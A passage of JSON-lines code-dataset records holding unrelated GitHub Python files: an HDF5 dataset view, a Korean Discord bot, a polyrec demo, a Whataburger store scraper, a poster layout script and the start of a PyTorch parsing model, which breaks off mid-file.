AMSHDF5VirtualDBReader(data_files, self.input_feature_names, self.output_feature_names)\n self._fd = h5py.File(self._hvds.fn, \"r\")\n return self\n\n @abc.abstractproperty\n def input_feature_names(self):\n \"\"\"a list of the names of the input features\"\"\"\n\n @abc.abstractproperty\n def input_feature_dims(self):\n \"\"\"a list of the dimensions of input features\"\"\"\n\n @abc.abstractproperty\n def input_feature_types(self):\n \"\"\"a list of the types of input features\"\"\"\n\n def describe_inputs(self):\n return {\n \"feature names\": self.input_feature_names,\n \"feature dims\": self.input_feature_dims,\n \"feature types\": self.input_feature_types,\n }\n\n @abc.abstractproperty\n def output_feature_names(self):\n \"\"\"a list of the names of the output features\"\"\"\n\n @abc.abstractproperty\n def output_feature_dims(self):\n \"\"\"a list of the dimensions of output features\"\"\"\n\n @abc.abstractproperty\n def output_feature_types(self):\n \"\"\"a list of the types of output features\"\"\"\n\n def describe_outputs(self):\n return {\n \"feature names\": self.output_feature_names,\n \"feature dims\": self.output_feature_dims,\n \"feature types\": self.output_feature_types,\n }\n\n # methods for collecting data. Should be overloaded for more complex workflows\n\n def get_input_data(self):\n \"\"\"Return the input data for this dataset\"\"\"\n\n if self._fd is None:\n raise RuntimeError(\"Trying to access closed AMS dataset\")\n\n return self._fd[\"inputs\"]\n\n def get_output_data(self):\n \"\"\"return the output data for this dataset\"\"\"\n\n if self._fd is None:\n raise RuntimeError(\"Trying to access closed AMS dataset\")\n\n return self._fd[\"outputs\"]\n\n def get_data(self):\n return self.get_input_data(), self.get_output_data()\n\n def get(self, k):\n return self.kosh_dataset.get(k)\n\n @property\n def versions(self):\n return self.versions\n pass\n\n @versions.getter\n def versions(self):\n return self._versions\n", "repo_name": "LLNL/AMS", "sub_path": "src/AMSWorkflow/ams/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 8561, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "h5py.VirtualLayout", "line_number": 76, "usage_type": "call"}, {"api_name": "h5py.VirtualLayout", "line_number": 77, "usage_type": "call"}, {"api_name": "h5py.VirtualSource", "line_number": 81, "usage_type": "call"}, {"api_name": "h5py.VirtualSource", "line_number": 83, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 100, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 122, "usage_type": "call"}, {"api_name": "tempfile.mkdtemp", "line_number": 122, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 125, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 135, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 136, "usage_type": "call"}, {"api_name": "abc.ABC", "line_number": 144, "usage_type": "attribute"}, {"api_name": "ams.store.AMSDataStore.valid_entries", "line_number": 159, "usage_type": "attribute"}, {"api_name": "ams.store.AMSDataStore", "line_number": 159, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 192, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 195, "usage_type": "attribute"}, {"api_name": "abc.abstractproperty", "line_number": 199, "usage_type": "attribute"}, {"api_name": "abc.abstractproperty", "line_number": 203, "usage_type": "attribute"}, {"api_name": "abc.abstractproperty", "line_number": 214, "usage_type": "attribute"}, {"api_name": "abc.abstractproperty", "line_number": 218, "usage_type": "attribute"}, {"api_name": "abc.abstractproperty", "line_number": 222, "usage_type": "attribute"}]} +{"seq_id": "2209228337", "text": "import discord\r\nclient = discord.Client()\r\n@client.event\r\nasync def on_ready():\r\n print('로그인되었습니다!')\r\n print(client.user.name)\r\n print(client.user.id)\r\n print('====================================')\r\n\r\n@client.event\r\nasync def on_ready(): # 봇이 실행되면 한 번 실행됨\r\n print(\"이 문장은 Python의 내장 함수를 출력하는 터미널에서 실행됩니다\\n지금 보이는 것 처럼 말이죠\")\r\n await client.change_presence(status=discord.Status.online, activity=discord.Game(\"채편님 팬이에요\"))\r\n\r\n@client.event\r\nasync def on_message(message):\r\n if message.content == '심채편':\r\n await message.channel.send('잘생김!')\r\naccess_token = os.environ[\"BOT_TOKEN\"]\r\nclient.run(access_token)\r\n", "repo_name": "kahyul/-", "sub_path": "Untitled-1.py", "file_name": "Untitled-1.py", "file_ext": "py", "file_size_in_byte": 765, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "discord.Client", "line_number": 2, "usage_type": "call"}, {"api_name": "discord.Status", "line_number": 13, "usage_type": "attribute"}, {"api_name": "discord.Game", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "26149830323", "text": "from pycparser import c_parser, c_ast\nimport ast, astunparse\nfrom polyrec.ctopy import CtoPy\nfrom polyrec.pyast import Analyze\nfrom polyrec.transformations import Transformation\nfrom polyrec.pyastxforms import Transform\nfrom polyrec.witnesstuples import WitnessTuple\nfrom polyrec.dependencetest import Dependence\n\ndef representation(file):\n with open(file) as source:\n # reading the c file\n parser = c_parser.CParser()\n astc = parser.parse(source.read())\n # convert to python\n pysrc = CtoPy(astc)\n tree = ast.parse(pysrc.getPy())\n analyze = Analyze(tree)\n analyze.collect()\n xform = Transform(analyze)\n xform.analyze.depanalyze()\n # print info\n print(\"number of dimensions: \", analyze.getdim())\n print(\"every dimension type: \", analyze.getdimtype())\n print(\"alphabet for each dimension: \", analyze.getalp())\n print(\"order of statements: \", analyze.getord())\n print(\"index variables: \", analyze.getindvar())\n print(\"source code: \", analyze.codegen())\n print(\"Witness Tuples: \", xform.analyze.getdeps())\n\nif __name__ == \"__main__\":\n representation(\"examples/sources/loop-rec.c\")", "repo_name": "kirshanthans/polyrec", "sub_path": "demo/representation.py", "file_name": "representation.py", "file_ext": "py", "file_size_in_byte": 1208, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pycparser.c_parser.CParser", "line_number": 13, "usage_type": "call"}, {"api_name": "pycparser.c_parser", "line_number": 13, "usage_type": "name"}, {"api_name": "polyrec.ctopy.CtoPy", "line_number": 16, "usage_type": "call"}, {"api_name": "ast.parse", "line_number": 17, "usage_type": "call"}, {"api_name": "polyrec.pyast.Analyze", "line_number": 18, "usage_type": "call"}, {"api_name": "polyrec.pyastxforms.Transform", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "29619233549", "text": "#!/usr/bin/python\nimport requests # HTTP requests\nimport shutil\nimport os\nfrom time import sleep\nfrom bs4 import BeautifulSoup\nimport argparse\nimport json\nfrom pymongo import MongoClient\n\nMONGO_PEM = os.environ.get(\"MONGO_PEM\")\nMONGO_STRING = os.environ.get(\"MONGO_STRING\")\n\nkey = os.environ.get(\"STREETVIEW_API_KEY\")\n\n\ndef SaveStreetView(filename, params):\n rootURL = \"https://maps.googleapis.com/maps/api/streetview\"\n params[\"key\"] = key,\n\n res = requests.get(rootURL, params=params, stream=True)\n sleep(0.2)\n\n if res.status_code == 200:\n with open(f\"{filename}\", 'wb') as f:\n shutil.copyfileobj(res.raw, f)\n f.close()\n else:\n print('Image Couldn\\'t be retrieved')\n\n\ndef getPage(url):\n ''' returns a soup object that contains all the information\n of a certain webpage'''\n result = requests.get(url)\n sleep(0.1)\n content = result.content\n return BeautifulSoup(content, \"html.parser\")\n\n\ndef getArgs():\n # Create argument parser for dry runs / testing\n parser = argparse.ArgumentParser(\n description=\"Generate artificial Whataburgers\")\n parser.add_argument(\n \"--samples\",\n type=int,\n default=100,\n help=\"Number of samples to grab from page.\",\n )\n parser.add_argument(\n \"--input-file\",\n type=str,\n help=\"Metadata JSON file\",\n )\n parser.add_argument(\n \"--output-dir\",\n type=str,\n default=\"./stores\",\n help=\"Image output directory\",\n )\n parser.add_argument(\n \"--output-file\",\n type=str,\n default=\"test.json\",\n help=\"Metadata output filename\",\n )\n parser.add_argument(\n \"--museum\",\n type=str,\n help=\"Museum to peruse\",\n )\n parser.add_argument(\n \"--artist\",\n type=str,\n default=\"\",\n help=\"Artist name\",\n )\n parser.add_argument(\n \"--medium\",\n type=str,\n default=\"\",\n help=\"Art format\",\n )\n parser.add_argument(\n \"--classification\",\n type=str,\n default=\"\",\n help=\"Style of art\",\n )\n return parser.parse_args()\n\n\ndef getMetadata(output_dir):\n '''\n Extract all Whataburger store metadata\n '''\n # Create output directories if needed\n if not os.path.exists(f\"{output_dir}\"):\n os.mkdir(f\"{output_dir}\")\n if not os.path.exists(f\"{output_dir}/metadata\"):\n os.mkdir(f\"{output_dir}/metadata\")\n\n rootURL = \"https://locations.whataburger.com/\"\n\n collection = get_collection()\n existingStores = [item[\"number\"] for item in collection.find()]\n category_index = collection.create_index(\"number\")\n\n # Get BS4 object from webpage\n stateDirectory = getPage(F\"{rootURL}directory.html\")\n # Find all state URLs\n stateSlugs = stateDirectory.findAll(\n \"a\", {\"class\": [\"Directory-listLink\"]}\n )\n\n for state in stateSlugs:\n state = state.attrs[\"href\"]\n # Skip weird URLs\n if len(state) > 8:\n continue\n\n # Get state symbol (ex. \"TX\")\n stateSymbol = state.split(\".\")[0].upper()\n\n cityDirectory = getPage(f\"{rootURL}{state}\")\n citySlugs = cityDirectory.findAll(\n \"a\", {\"class\": \"Directory-listLink\"}\n )\n for city in citySlugs:\n city = city.attrs[\"href\"]\n # Extract city name (Ex. \"Dallas\")\n cityName = city.split(\"/\")[1].split(\".\")[0].title()\n storeDirectory = getPage(f\"{rootURL}{city}\")\n # First look for multiple addresses\n addresses = storeDirectory.findAll(\n \"span\", {\"class\": \"c-address-street-1\"}\n )\n\n # Extra store numbers from page\n numbers = storeDirectory.find(\n \"span\", {\"id\": \"location-name\"})\n\n # If first method fails try others\n if numbers is None:\n numbers = storeDirectory.findAll(\n \"span\", {\"class\": \"locationName-displayName\"})\n else:\n addresses = [addresses[0]]\n\n if len(numbers) == 0:\n numbers = storeDirectory.findAll(\n \"span\", {\"class\": \"LocationName-displayName\"})\n\n for number, address in zip(numbers, addresses):\n # Extract store number as integer\n storeNumber = int(number.text.split(\" #\")[1].strip())\n\n # DB Schema\n # Reformat address for Google API query\n # (ex. 123+First+St+City+ST)\n params = {\n \"query\": f\"Whataburger+{address.text.replace(' ', '+')},{cityName},{stateSymbol}\",\n \"address\": f\"{address.text}\",\n \"city\": f\"{cityName}\",\n \"state\": f'{stateSymbol}',\n \"number\": storeNumber,\n \"oresent\": False,\n \"size\": \"600x600\",\n \"heading\": [0, 340],\n \"fov\": [60, 90],\n \"pitch\": [8, 12],\n }\n\n if storeNumber in existingStores:\n continue\n\n print(\n f\"Store {storeNumber} is in {params['address'].replace('+',' ')},{cityName},{stateSymbol}\")\n collection.insert_one(params)\n '''\n with open(f\"{output_dir}/metadata/{storeNumber}.json\", \"w\") as f:\n f.write(json.dumps(params))\n f.close()\n\n for angle in range(12):\n params[\"heading\"] = angle * 30\n SaveStreetView(\n f\"{output_dir}/images/{address}/{params['heading']}.jpg\", params)\n '''\n\n\ndef ExtractParams(params):\n return {\n \"location\": params[\"location\"],\n \"size\": params[\"size\"],\n }\n\n\ndef getImages(output_dir):\n for fileName in sorted(os.listdir(f\"{output_dir}/metadata\"))[:10]:\n with open(f\"{output_dir}/metadata/{fileName}\", \"r\") as f:\n params = json.load(f)\n f.close()\n\n if os.path.exists(f\"{output_dir}/images/{params['number']}\"):\n print(f\"Skipping store {params['number']}\")\n # continue\n else:\n os.mkdir(f\"{output_dir}/images/{params['number']}\")\n\n queryParams = {\n \"location\": params[\"location\"],\n \"size\": params[\"size\"],\n }\n\n for degrees in range(params[\"heading\"][0], params[\"heading\"][1], 60):\n queryParams[\"heading\"] = degrees\n for zoom in range(params[\"fov\"][0], params[\"fov\"][1], 5):\n print(f\"Zoom: {zoom}\")\n queryParams[\"fov\"] = zoom\n for angle in range(params[\"pitch\"][0], params[\"pitch\"][1]):\n queryParams[\"pitch\"] = angle\n print(queryParams)\n SaveStreetView(\n f\"{output_dir}/images/{params['number']}/h={degrees},z={zoom},a={angle}.jpg\", queryParams)\n\n\ndef get_collection():\n client = MongoClient(f\"{MONGO_STRING}\",\n tls=True,\n tlsCertificateKeyFile=f\"{MONGO_PEM}\")\n\n db = client['Whataburger']\n return db['stores']\n", "repo_name": "JimothyJohn/WhataGAN", "sub_path": "whatagan/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 7227, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ.get", "line_number": 11, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 12, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 21, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 22, "usage_type": "call"}, {"api_name": "shutil.copyfileobj", "line_number": 26, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 35, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 38, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 102, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 201, "usage_type": "call"}, {"api_name": "json.load", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 206, "usage_type": "call"}, {"api_name": "os.path", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 210, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 230, "usage_type": "call"}]} +{"seq_id": "41033298938", "text": "from flat import document, image, shape, font, strike\nimport os\nfrom PIL import Image\n\n\nbase_path = 'src/'\n\ndoc_width = 802.2\ndoc_height = 983.6\ndoc_marge_w = 60\ndoc_marge_h = 40\ndoc_gout = 15\n\nlayout_width = (doc_width - (doc_marge_w * 2))\nlayout_height = (doc_height - (doc_marge_h * 2))\n\nsepX = 3\nsepY = 6\ncell_width = layout_width/sepX\ncell_height = layout_height/sepY\nimg_width = cell_width - doc_gout\n\neli_heuer_txt = \"Captures d'écran du compte Twitter \\nd'Eli Heuer du 1er avril au 26 juin 2020 (Twitter.com/eliheuer)\\n© Eli Heuer/Twitter.\"\ntypeface_as_program_txt = \"Impression de la première version du caractère Programme sur une presse typographique, par David Keshavjee \\net Julien Tavelli, 2009 (Optimo.ch/typefaces/programme)\\n© David Keshavjee et Julien Tavelli.\"\nosp_txt = \"Création typographique sur FontForge par Open Source Publishing pour la communication 2020-2021 \\ndu théâtre Balsamine, 2020 (Osp.kitchen/work/balsamine.2020-2021)\\n© OSP/Free Art License version 1.3/Attribution ShareAlike Creative Commons BY-SA.\"\ncatalogtree_txt = \"Dispositif et prototypage pour la réalisation du projet *Structured Light* par Catalogtree, 2010 (Catalogtree.net/projects/structured_light)\\n© Catalogtree.\"\njurg_lehni_txt = \"*Hektor Draws a Landscape* & *Hektor Titles a Show*, « Lee 3 Tau Ceti Central Armory Show », Villa Arson, Nice, Villa Arson, Nice, 2003 et « Design and the Elastic Mind », MoMA New York, Jürg Lehni, 2008. (Juerglehni.com/works/hektor)\\n© Jürg Lehni & Uli Franke, 2002/Jürg Lehni & Alex Rich, 2003.\"\n\nexplication_txt = \"La mise en page de ce poster a été réalisée selon les principes exposés dans l'article au recto, \\\nen utilisant trois bibliothèques du langage Python pour la typographie et le traitement des images : \\\n\\nLa première bibliothèque est une version alpha de Drawbot, adaptée à la librairie graphique Skia \\\npour une utilisation sur différents systèmes d'exploitation par Just Van Rossum (pypi.org/project/drawbot-skia). \\\n\\nLa deuxième bibliothèque, Flat (xxyxyz.org) de Juraj Sukop, ne semble toutefois plus maintenue depuis 2018. \\\n\\nLa troisième bibliothèque, Pillow, est très utilisée (pillow.readthedocs.io) dans le domaine du traitement d'image. \\\n\\nLe code qui a permis la réalisation de ce poster est disponible à l'adresse : github.com/jeremien/maj.poster.\"\n\nregular = font.open('font/PlantinMTProRg.TTF')\nbold = font.open('font/Erbarre-Bold.otf')\nbody = strike(regular).size(10)\ntitre = strike(bold).size(13)\n\nd = document(doc_width, doc_height, 'pt')\np = d.addpage()\ns = shape()\n\ndef setImages(folder: str) -> list:\n images = []\n path = base_path + folder + '/'\n with os.scandir(path) as entries:\n for entry in entries:\n try:\n if entry.is_file():\n name = path + entry.name\n try:\n im = Image.open(name).convert('CMYK')\n print(im.mode)\n im.save(\n name,\n resolution=300.0,\n quality=100\n )\n except IOError:\n print('error pillow')\n continue\n\n try:\n im = image.open(name)\n images.append(im)\n except ValueError:\n print('error flat')\n continue\n except FileNotFoundError:\n continue\n print(images)\n return images\n\ndef grid() -> list:\n\n data = []\n posX = cell_width + doc_marge_w\n posY = cell_height + doc_marge_h\n\n x_data = []\n y_data = []\n\n for x in range(sepX):\n x_data.append((posX, posY))\n posX += cell_width\n\n for y in range(sepY):\n y_data.append((posX, posY))\n posY += cell_height\n\n data.append(x_data)\n data.append(y_data)\n\n return data\n\neli_heuer_img = setImages('eli_heuer')\ntypeface_as_program_img = setImages('typeface_as_program')\nosp_img = setImages('osp')\ncatalogtree_img = setImages('catalogtree')\njurg_lehni_img = setImages('jurg_lehni')\n\ng = grid()\n\nfor j in range(sepY):\n if j == 0:\n for i in range(sepX):\n if i == 0:\n p.place(eli_heuer_img[i]).position(doc_marge_w, doc_marge_h).fitwidth(img_width)\n elif i < 2:\n p.place(eli_heuer_img[i]).position(g[0][i-1][0], doc_marge_h).fitwidth(img_width)\n else:\n p.place(titre.text('Figures 1 et 2.')).frame(g[0][i-1][0],doc_marge_h + doc_gout,cell_width,cell_height)\n p.place(body.text(eli_heuer_txt)).frame(g[0][i-1][0] + 70,doc_marge_h + doc_gout,cell_width-doc_marge_w,cell_height)\n \n elif j == 1:\n for i in range(sepX):\n if i == 0:\n p.place(typeface_as_program_img[i]).position(doc_marge_w, g[1][j-1][1] - doc_gout).fitwidth(img_width)\n elif i < 2:\n p.place(typeface_as_program_img[i]).position(g[0][i-1][0], g[1][j-1][1] - doc_gout).fitwidth(img_width)\n else:\n p.place(titre.text('Figures 3 et 4.')).frame(g[0][i-1][0], g[1][j-1][1],cell_width,cell_height)\n p.place(body.text(typeface_as_program_txt)).frame(g[0][i-1][0] + 70, g[1][j-1][1],cell_width - 40,cell_height)\n\n elif j == 2:\n for i in range(sepX):\n if i == 0:\n p.place(osp_img[i]).position(doc_marge_w, g[1][j-1][1] + doc_gout).fitwidth(img_width)\n elif i < 2:\n p.place(osp_img[i]).position(g[0][i-1][0], g[1][j-1][1] + doc_gout).fitwidth(img_width)\n else:\n p.place(titre.text('Figures 5 et 6.')).frame(g[0][i-1][0], g[1][j-1][1] + doc_gout * 2,cell_width,cell_height)\n p.place(body.text(osp_txt)).frame(g[0][i-1][0] + 70,g[1][j-1][1] + doc_gout * 2,cell_width - 50,cell_height)\n\n elif j == 3:\n for i in range(sepX):\n if i == 0:\n p.place(catalogtree_img[i]).position(doc_marge_w, g[1][j-1][1] + doc_gout).fitwidth(img_width)\n elif i < 2:\n p.place(catalogtree_img[i]).position(g[0][i-1][0], g[1][j-1][1] + doc_gout).fitwidth(img_width)\n else:\n p.place(titre.text('Figures 7 et 8.')).frame(g[0][i-1][0], g[1][j-1][1] + doc_gout * 2,cell_width,cell_height)\n p.place(body.text(catalogtree_txt)).frame(g[0][i-1][0] + 70,g[1][j-1][1] + doc_gout * 2,cell_width - 40,cell_height)\n\n elif j == 4:\n for i in range(sepX):\n if i == 0:\n p.place(jurg_lehni_img[i]).position(doc_marge_w, g[1][j-1][1] + doc_gout * 3).fitwidth(img_width)\n elif i < 2:\n p.place(jurg_lehni_img[i]).position(g[0][i-1][0], g[1][j-1][1] + doc_gout * 3).fitwidth(img_width)\n else:\n p.place(titre.text('Figures 9 et 10.')).frame(g[0][i-1][0], g[1][j-1][1] + doc_gout * 4,cell_width,cell_height)\n p.place(body.text(jurg_lehni_txt)).frame(g[0][i-1][0] + 70,g[1][j-1][1] + doc_gout * 4,cell_width - 40,cell_height)\n\np.place(s.width(0.5).line(doc_marge_w - 20, doc_marge_h , doc_marge_w - 20, doc_height - doc_marge_h))\np.place(body.text(explication_txt)).frame(doc_marge_w, doc_height - (cell_height - doc_gout * 2),cell_width*2.5,cell_height)\n\nunique_id = 'icono'\nd.meta(unique_id).pdf('pdf/' + unique_id + '.pdf', compress=False, bleed=False, cropmarks=False)", "repo_name": "jeremien/maj.poster", "sub_path": "icono/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 6916, "program_lang": "python", "lang": "fr", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flat.font.open", "line_number": 37, "usage_type": "call"}, {"api_name": "flat.font", "line_number": 37, "usage_type": "name"}, {"api_name": "flat.font.open", "line_number": 38, "usage_type": "call"}, {"api_name": "flat.font", "line_number": 38, "usage_type": "name"}, {"api_name": "flat.strike", "line_number": 39, "usage_type": "call"}, {"api_name": "flat.strike", "line_number": 40, "usage_type": "call"}, {"api_name": "flat.document", "line_number": 42, "usage_type": "call"}, {"api_name": "flat.shape", "line_number": 44, "usage_type": "call"}, {"api_name": "os.scandir", "line_number": 49, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 55, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 55, "usage_type": "name"}, {"api_name": "flat.image.open", "line_number": 67, "usage_type": "call"}, {"api_name": "flat.image", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "23838792042", "text": "import torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\nfrom torch.nn.utils import rnn as rnn_utils\nfrom torch.distributions.gumbel import Gumbel\nimport numpy as np\nfrom transformers import BertModel, BertConfig\n# from joeynmt.embeddings import Embeddings as Seq2seqEmbeddings\n# from joeynmt.encoders import RecurrentEncoder\n# from joeynmt.decoders import RecurrentDecoder\n# from joeynmt.search import greedy\n\nfrom .token_dictionary import TokenDictionary, UNKNOWN\nfrom .constants import Target, SPECIAL_SYMBOLS, PADDING, BOS, EOS, \\\n ParsingObjective\nfrom ..layers.lstm import CharLSTM, HighwayLSTM, LSTM\nfrom ..layers.biaffine import DeepBiaffineScorer\n\n\ngumbel = Gumbel(0, 1)\nencoder_dim = 768\nmax_encoder_length = 512\n\n\ndef create_padding_mask(lengths):\n \"\"\"\n Create a mask with 1 for padding values and 0 in real values.\n\n :param lengths: length of each sequence\n :return: 2d tensor\n \"\"\"\n batch_size = len(lengths)\n max_len = lengths.max()\n positions = torch.arange(max_len, device=lengths.device)\\\n .expand(batch_size, max_len)\n mask = positions >= lengths.unsqueeze(1)\n\n return mask\n\n\ndef get_padded_lemma_indices(instances, max_instance_length):\n \"\"\"\n Create a tensor with lemma char indices.\n\n :param instances: list of instances\n :param max_instance_length: int, maximum number of tokens including root\n :return: tuple padded_lemmas, padded_lengths. Roots are not counted.\n padded_lemmas is a tensor shape (batch, num_words, num_chars)\n padded_lengths is (batch, num_words)\n \"\"\"\n instances_lemmas = []\n lengths = []\n max_instance_length -= 1\n\n for instance in instances:\n # each item in lemma_characters is a numpy array with lemma chars\n # [1:] to skip root\n lemma_list = [torch.tensor(lemma)\n for lemma in instance.lemma_characters[1:]]\n instance_lengths = torch.tensor([len(lemma) for lemma in lemma_list])\n\n # create empty tensors to match max instance length\n diff = max_instance_length - len(lemma_list)\n if diff:\n padding = diff * [torch.tensor([], dtype=torch.long)]\n lemma_list += padding\n\n instance_lemmas = rnn_utils.pad_sequence(lemma_list, batch_first=True)\n\n # we transpose num_tokens with token_length because it is easier to add\n # padding tokens than padding chars\n instances_lemmas.append(instance_lemmas.transpose(0, 1))\n lengths.append(instance_lengths)\n\n padded_transposed = rnn_utils.pad_sequence(instances_lemmas, True)\n padded_lemmas = padded_transposed.transpose(1, 2)\n padded_lengths = rnn_utils.pad_sequence(lengths, batch_first=True)\n\n return padded_lemmas, padded_lengths\n\n\ndef create_char_indices(instances, max_sentence_length):\n \"\"\"\n Create a tensor with the character indices for all words in the instances.\n\n :param instances: a list of DependencyInstance objects\n :param max_sentence_length: int\n :return: a tuple (char_indices, token_lengths). Sentence length includes\n root.\n - char_indices is (batch, max_sentence_length, max_token_length).\n - token_lengths is (batch_size, max_sentence_length)\n \"\"\"\n batch_size = len(instances)\n token_lengths_ = [[len(inst.get_characters(i))\n for i in range(len(inst))]\n for inst in instances]\n max_token_length = max(max(inst_lengths)\n for inst_lengths in token_lengths_)\n\n shape = [batch_size, max_sentence_length]\n token_lengths = torch.zeros(shape, dtype=torch.long)\n\n shape = [batch_size, max_sentence_length, max_token_length]\n char_indices = torch.zeros(shape, dtype=torch.long)\n\n for i, instance in enumerate(instances):\n token_lengths[i, :len(instance)] = torch.tensor(token_lengths_[i])\n\n for j in range(len(instance)):\n # each j is a token\n chars = instance.get_characters(j)\n char_indices[i, j, :len(chars)] = torch.tensor(chars)\n\n return char_indices, token_lengths\n\n\n# class Lemmatizer(nn.Module):\n# \"\"\"\n# Lemmatizer that uses a recurrent encoder-decoder framework.\n# \"\"\"\n# def __init__(self, vocab_size, embedding_size, hidden_size, dropout_rate,\n# context_size, token_dictionary):\n# \"\"\"\n# :param vocab_size: size of the char vocabulary\n# :param embedding_size: size of the char embeddings\n# :param hidden_size: hidden state of the encoder. Decoder is twice that.\n# :param dropout_rate: dropout\n# :param context_size: size of the context vector given as additional\n# input\n# :type token_dictionary: TokenDictionary\n# \"\"\"\n# super(Lemmatizer, self).__init__()\n# self.padding_idx = token_dictionary.get_character_id(PADDING)\n# self.eos_idx = token_dictionary.get_character_id(EOS)\n# self.bos_idx = token_dictionary.get_character_id(BOS)\n#\n# self.dropout = nn.Dropout(dropout_rate)\n# self.embeddings = Seq2seqEmbeddings(\n# embedding_size, vocab_size=vocab_size, padding_idx=self.padding_idx)\n# self.encoder = RecurrentEncoder(\n# hidden_size=hidden_size, emb_size=embedding_size,\n# num_layers=2, dropout=dropout_rate, bidirectional=True)\n# self.decoder = RecurrentDecoder(\n# emb_size=embedding_size, hidden_size=2 * hidden_size,\n# encoder=self.encoder, attention='luong', num_layers=2,\n# vocab_size=vocab_size, dropout=dropout_rate, input_feeding=True)\n# self.context_transform = nn.Linear(\n# context_size, embedding_size, bias=False)\n#\n# def append_eos(self, chars, lengths):\n# \"\"\"\n# Append an EOS token at the appropriate position after each sequence.\n#\n# The returned tensor will have the max length increased by one.\n#\n# :param chars: tensor (batch, max_length)\n# :param lengths: tensor (batch)\n# :return: tensor (batch, max_length + 1)\n# \"\"\"\n# batch_size, max_length = chars.shape\n# padding_column = self.padding_idx * torch.ones_like(chars[:, 0])\n# extended = torch.cat([chars, padding_column.unsqueeze(1)], dim=1)\n#\n# # trick to get the last non-padding position\n# extended[torch.arange(batch_size), lengths] = self.eos_idx\n#\n# return extended\n#\n# def prepend_bos(self, chars):\n# \"\"\"\n# Prepend a BOS token at the beginning of the character sequences.\n#\n# The returned tensor will have the max length increased by one.\n#\n# :param chars: tensor (batch, max_length)\n# :return: tensor (batch, max_length + 1)\n# \"\"\"\n# bos_column = self.bos_idx * torch.ones_like(chars[:, 0])\n# extended = torch.cat([bos_column.unsqueeze(1), chars], dim=1)\n#\n# return extended\n#\n# def forward(self, chars, context, token_lengths, gold_chars=None,\n# gold_lengths=None):\n# \"\"\"\n# :param chars: tensor (batch, max_sentence_length, max_token_length)\n# with char ids\n# :param context: tensor (batch, max_sentence_length, max_token_length.\n# num_units) with contextual representation of each word\n# :param token_lengths: tensor (batch, max_sentence_length) with length\n# of each word\n# :param gold_chars: only used in training. tensor\n# (batch, max_sentence_length, max_lemma_length)\n# :param gold_lengths: only used in training; length of each gold lemma.\n# tensor (batch, max_sentence_length)\n# :return:\n# If training: tensor (batch, max_sentence_length, max_token_length,\n# vocab_size) with logits for each character.\n# At inference time: tensor (batch, max_sentence_length,\n# unroll_steps + 1) with character indices and possibly EOS.\n# \"\"\"\n# batch_size, max_sentence_length, max_token_length = chars.shape\n# new_shape = [batch_size * max_sentence_length, max_token_length]\n# chars = chars.reshape(new_shape)\n# token_lengths1d = token_lengths.reshape(-1)\n#\n# # run only on non-padding tokens\n# real_tokens = token_lengths1d > 0\n# num_real_tokens = real_tokens.sum().item()\n# token_lengths1d = token_lengths1d[real_tokens]\n#\n# # project contexts into (num_real_tokens, 1, num_units)\n# projected_context = self.context_transform(self.dropout(context))\n# projected_context = projected_context.view(\n# batch_size * max_sentence_length, 1, -1)\n# projected_context = projected_context[real_tokens]\n#\n# # (num_real_tokens, max_token_length, num_units)\n# chars = chars[real_tokens]\n#\n# embedded_chars = self.embeddings(chars)\n#\n# # create a binary mask\n# counts = torch.arange(max_token_length).view(1, 1, -1).to(chars.device)\n# stacked_counts = counts.repeat(num_real_tokens, 1, 1)\n# lengths3d = token_lengths1d.view(-1, 1, 1)\n# mask = stacked_counts < lengths3d\n#\n# encoder_input = torch.cat([projected_context, embedded_chars], 1)\n# encoder_output, encoder_state, _ = self.encoder(\n# encoder_input, token_lengths1d, mask)\n#\n# if gold_chars is None:\n# # allow for short words with longer lemmas\n# unroll_steps = max(5, int(1.5 * max_token_length))\n# predictions, _ = greedy(\n# mask, self.embeddings, self.bos_idx, self.eos_idx, unroll_steps,\n# self.decoder, encoder_output, encoder_state)\n#\n# # predictions is a numpy array\n# output = 